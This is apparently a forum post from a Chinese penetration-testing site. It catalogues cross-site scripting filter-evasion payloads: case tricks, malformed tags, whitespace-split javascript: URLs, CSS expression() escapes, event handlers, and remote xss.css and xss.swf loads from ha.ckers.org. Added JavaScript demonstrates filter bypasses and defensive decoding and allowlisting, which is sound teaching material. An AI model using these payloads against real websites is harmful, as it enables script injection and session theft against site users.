中国网络渗透测试联盟

Title: Introduction to Cross Site Scripting (XSS) attack techniques

Author: admin    Posted: 2012-12-31 09:59
1. Change the letter case (beats a case-sensitive match on "<script>"):

    <sCript>alert('d')</scRipT>

2. Add extra characters to evade the regular-expression check (the filter's regex stops at the first ">" or splits on whitespace, while the browser reads the quoted attribute value through to its closing quote):

    <<script>alert('c')//<</script>

    <SCRIPT a=">" SRC="t.js"></SCRIPT>

    <SCRIPT =">" SRC="t.js"></SCRIPT>

    <SCRIPT a=">" " SRC="t.js"></SCRIPT>

    <SCRIPT "a='>'" SRC="t.js"></SCRIPT>

    <SCRIPT a=`>` SRC="t.js"></SCRIPT>

    <SCRIPT a=">'>" SRC="t.js"></SCRIPT>
3. Use another extension instead of .js (a filter that only blocks URLs ending in .js misses this):

    <script src="bad.jpg"></script>
4. Put the JavaScript in a CSS file

    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

       example:

          body {

               background-image: url('javascript:alert("XSS");')

          }
5. Insert other characters into the script tag (the HTML tokenizer treats "/" like whitespace between attributes):

    <SCRIPT/SRC="t.js"></SCRIPT>

    <SCRIPT/anyword SRC="t.js"></SCRIPT>
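The payloads in sections 2 and 5 only work against a filter that locates the tag with a regular expression. The JavaScript below is an added illustration, not code from the original post (the function names naiveScriptSrc, tokenizeStartTag, scriptSrc and compare are mine): it runs those payloads through such a regex filter and through a small quote-aware reader that approximates how an HTML5 parser tokenizes a start tag, and reports which payloads the filter never sees as a script element with a src attribute.

```javascript
'use strict';

// Added example (not from the original post); function names are mine.
// A regex-based inspector of the kind sections 1, 2 and 5 target, beside a
// quote-aware start-tag reader that approximates how an HTML5 parser tokenizes
// the same markup. The browser's view is the one that matters.

// Naive inspector: match "<tag ...>" up to the FIRST ">" and split the rest on
// whitespace. Names are compared case-insensitively, so section 1 no longer
// helps against it; sections 2 and 5 still do.
function naiveScriptSrc(html) {
  const m = /<(\w+)([^>]*)>/.exec(html);
  if (!m || m[1].toLowerCase() !== 'script') return null;
  for (const part of m[2].trim().split(/\s+/)) {
    const eq = part.indexOf('=');
    if (eq > 0 && part.slice(0, eq).toLowerCase() === 'src') {
      return part.slice(eq + 1).replace(/^["']|["']$/g, '');
    }
  }
  return null;
}

// Quote-aware reader. Rules that matter here: the first "<" followed by a
// letter opens a tag (so "<<script>" still yields a script tag), whitespace and
// "/" both separate attributes, a quoted value runs to its closing quote (a ">"
// inside quotes does not end the tag), a backtick is an ordinary character,
// names are ASCII case-insensitive, and a repeated attribute keeps its first
// value. Returns { name, attrs } for the first start tag, or null.
function tokenizeStartTag(html) {
  const open = /<([A-Za-z][^\s/>]*)/.exec(html);
  if (!open) return null;
  const tag = { name: open[1].toLowerCase(), attrs: Object.create(null) };
  let i = open.index + open[0].length;
  while (i < html.length) {
    while (i < html.length && /[\s/]/.test(html[i])) i++;
    if (i >= html.length || html[i] === '>') break;
    // Attribute name; a leading "=" becomes part of the name, any later "="
    // starts the value (both as in the HTML5 tokenizer).
    let j = i;
    while (j < html.length && !/[\s/>]/.test(html[j]) && !(j > i && html[j] === '=')) j++;
    const name = html.slice(i, j).toLowerCase();
    i = j;
    while (i < html.length && /\s/.test(html[i])) i++;
    let value = '';
    if (html[i] === '=') {
      i++;
      while (i < html.length && /\s/.test(html[i])) i++;
      const q = html[i];
      if (q === '"' || q === "'") {
        const end = html.indexOf(q, i + 1);
        value = html.slice(i + 1, end < 0 ? html.length : end);
        i = end < 0 ? html.length : end + 1;
      } else {
        j = i;
        while (j < html.length && !/[\s>]/.test(html[j])) j++;
        value = html.slice(i, j);
        i = j;
      }
    }
    if (!(name in tag.attrs)) tag.attrs[name] = value;
  }
  return tag;
}

function scriptSrc(html) {
  const t = tokenizeStartTag(html);
  return t && t.name === 'script' && 'src' in t.attrs ? t.attrs.src : null;
}

// Payloads from sections 2 and 5 above (smart quotes straightened).
const PAYLOADS = [
  '<SCRIPT a=">" SRC="t.js"></SCRIPT>',
  '<SCRIPT "a=\'>\'" SRC="t.js"></SCRIPT>',
  '<SCRIPT a=">\'>" SRC="t.js"></SCRIPT>',
  '<SCRIPT/SRC="t.js"></SCRIPT>',
  '<SCRIPT/anyword SRC="t.js"></SCRIPT>',
];
function compare(payloads = PAYLOADS) {
  return payloads.map((p) => ({ payload: p, naive: naiveScriptSrc(p), tokenizer: scriptSrc(p) }));
}
for (const r of compare()) console.log(r);
```

Run it with node. The tokenizer is not itself a safe filter (it is not a full HTML parser); the point is that any inspector which does not read markup the way the browser does will disagree with the browser on some input, and the attacker gets to choose that input. The robust fix is context-aware output encoding or a sanitizer built on a real HTML parser, not a tighter regex.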
6. Use a tab or newline to evade

    <img src="jav ascr ipt:alert('XSS3')">

    <img src="jav ascr ipt:alert('XSS3')">

    <IMG SRC="jav ascript:alert('XSS');">

         The gaps inside "javascript" are a tab character in one payload and a newline in the other (both rendered as a plain space on this page); the browser's URL parser strips ASCII tab and newline before it reads the scheme, so the value still resolves to javascript:.

7. Use "\" to evade (CSS resolves backslash escapes and discards /* */ comments before it reads the property; expression() itself only ever ran in Internet Explorer)

    <STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

    <IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

    <IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
8. Use hex encoding to evade (the ";" that closes a character reference can also be dropped). The encoded form of each payload did not survive on this page; the decoded source is:

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
9. Script in an HTML tag's event-handler attribute

    <body onload="alert('onload')">

        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
10. XSS code inside an SWF file

    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
11. Use CDATA to split the XSS code and let the browser reassemble it (Internet Explorer data binding via DATASRC/DATAFLD)

    <XML ID=I><X><C>

    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>

    </C></X>

    </xml>

    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

    <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
12. Use HTML+TIME (an Internet Explorer behavior)

    <HTML><BODY>

    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">

    <?import namespace="t" implementation="#default#time2">

    <t:set attributeName="innerHTML" to="anyword&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;">

    </BODY></HTML>
13. Write a cookie via META (HTTP-EQUIV="Set-Cookie" is no longer honored by current browsers)

    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
14. javascript: in src, href and url(). Of these, only the frame and iframe forms still execute in current browsers; the others depend on old browsers (DYNSRC and LOWSRC are Internet Explorer attributes).

    <IFRAME SRC=javascript:alert('13')></IFRAME>

    <img src="javascript:alert('XSS3')">

    <IMG DYNSRC="javascript:alert('XSS20')">

    <IMG LOWSRC="javascript:alert('XSS21')">

    <LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

    <IFRAME SRC=javascript:alert('XSS27')></IFRAME>

    <TABLE BACKGROUND="javascript:alert('XSS29')">

    <DIV STYLE="background-image: url(javascript:alert('XSS30'))">

    <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}

    </STYLE><A CLASS=XSS></A>

    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
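Sections 6, 7, 8 and 14 all rely on a filter inspecting the raw attribute text where the browser acts on a decoded value. The JavaScript below is an added example, not code from the original post: it performs the decoding the browser does first (HTML character references with or without the ";", the WHATWG URL parser's removal of tab, LF and CR, and CSS backslash escapes and comments) and only then checks the URL scheme against an allowlist or the CSS value for expression() and javascript:. The function names are mine, the named-entity table is a small assumed subset, and the inputs marked "constructed" are mine; the remaining inputs are the payloads listed above with their quotes straightened.

```javascript
'use strict';

// Added example (not from the original post). Function names are mine; the
// inputs marked "constructed" are mine, the rest are payloads from the page.
const cp = (n) => (Number.isFinite(n) && n <= 0x10ffff ? String.fromCodePoint(n) : '\uFFFD');

// 1. HTML character references, which the HTML parser resolves in an attribute
//    value before the URL parser sees it. Numeric forms decode with or without
//    the trailing ";" (the ";" section 8 says can be dropped); named forms need
//    it. NAMED is a small assumed subset of the real entity table.
const NAMED = { colon: ':', Tab: '\t', NewLine: '\n', lpar: '(', rpar: ')', quot: '"', apos: "'", amp: '&' };
function decodeCharRefs(s) {
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => cp(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => cp(parseInt(d, 10)))
    .replace(/&([A-Za-z]+);/g, (m, n) => (n in NAMED ? NAMED[n] : m));
}

// 2. The scheme as the WHATWG URL parser reads it: trim leading/trailing C0
//    controls and spaces, delete every ASCII tab, LF and CR (section 6), then
//    take the scheme up to the first ":". Returns null for a relative URL.
function urlScheme(attrValue) {
  const s = decodeCharRefs(attrValue)
    .replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, '')
    .replace(/[\t\n\r]/g, '');
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(s);
  return m ? m[1].toLowerCase() : null;
}
const SAFE_SCHEMES = new Set(['http', 'https', 'mailto']); // allowlist, not a blocklist
function isSafeUrl(attrValue) {
  const scheme = urlScheme(attrValue);
  return scheme === null || SAFE_SCHEMES.has(scheme);
}

// 3. CSS (section 7). The tokenizer drops /* */ comments, except inside string
//    tokens (which the last section 7 payload exploits), and resolves "\"
//    escapes: "\" + 1-6 hex digits (+ one optional space) is a code point, "\"
//    + any other character is that character.
function stripCssComments(css) {
  let out = '';
  for (let i = 0; i < css.length; ) {
    const c = css[i];
    if (c === '"' || c === "'") {                       // copy a string token verbatim
      let j = i + 1;
      while (j < css.length && css[j] !== c) j += css[j] === '\\' ? 2 : 1;
      out += css.slice(i, j + 1);
      i = j + 1;
    } else if (c === '/' && css[i + 1] === '*') {       // drop a comment
      const end = css.indexOf('*/', i + 2);
      i = end < 0 ? css.length : end + 2;
    } else {
      out += c;
      i++;
    }
  }
  return out;
}
function normalizeCss(css) {
  return stripCssComments(css).replace(/\\([0-9a-f]{1,6})\s?|\\([\s\S])/gi,
    (_, hex, ch) => (hex ? cp(parseInt(hex, 16)) : ch));
}
function cssIsDangerous(css) {
  const n = normalizeCss(css);
  return /expression\s*\(/i.test(n) || /javascript:/i.test(n);
}

// Naive raw-text checks beside the normalising ones, over the page's payloads.
const URL_SAMPLES = [
  "jav\tascr\nipt:alert('XSS3')",       // section 6: tab and newline inside the scheme
  "&#106;avascript:alert('abc')",       // constructed: section 8 style numeric reference
  "&#106avascript:alert('abc')",        // constructed: same with the ";" dropped
  '&#x09;javascript:alert(1)',          // constructed: leading tab via hex reference
  'https://example.com/',               // constructed benign control
];
const CSS_SAMPLES = [
  `@im\\port'\\ja\\vasc\\ript:alert("XSS32")';`,
  "xss:expr/*anyword*/ession(alert('sss'))",
  "width: expre\\ssi\\on(alert('XSS31'));",
  `no\\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))`,
  'width: expr\\65 ssion(alert(1))',    // constructed: hex escape for "e"
];
function report() {
  return {
    urls: URL_SAMPLES.map((u) => ({ input: u, naive: /^javascript:/i.test(u), scheme: urlScheme(u), safe: isSafeUrl(u) })),
    css: CSS_SAMPLES.map((c) => ({ input: c, naive: /expression\s*\(/i.test(c), normalized: normalizeCss(c), dangerous: cssIsDangerous(c) })),
  };
}
console.log(JSON.stringify(report(), null, 2));
```

Run it with node. Every URL sample except the benign control passes the naive /^javascript:/ test and fails the scheme allowlist, and every CSS sample passes the naive /expression\(/ test and is flagged once normalized. The design choice is the order of operations: decode exactly as the consuming parser would, then apply an allowlist (here, of schemes) rather than a blocklist of strings, because a blocklist only ever covers the encodings its author thought of.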
Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2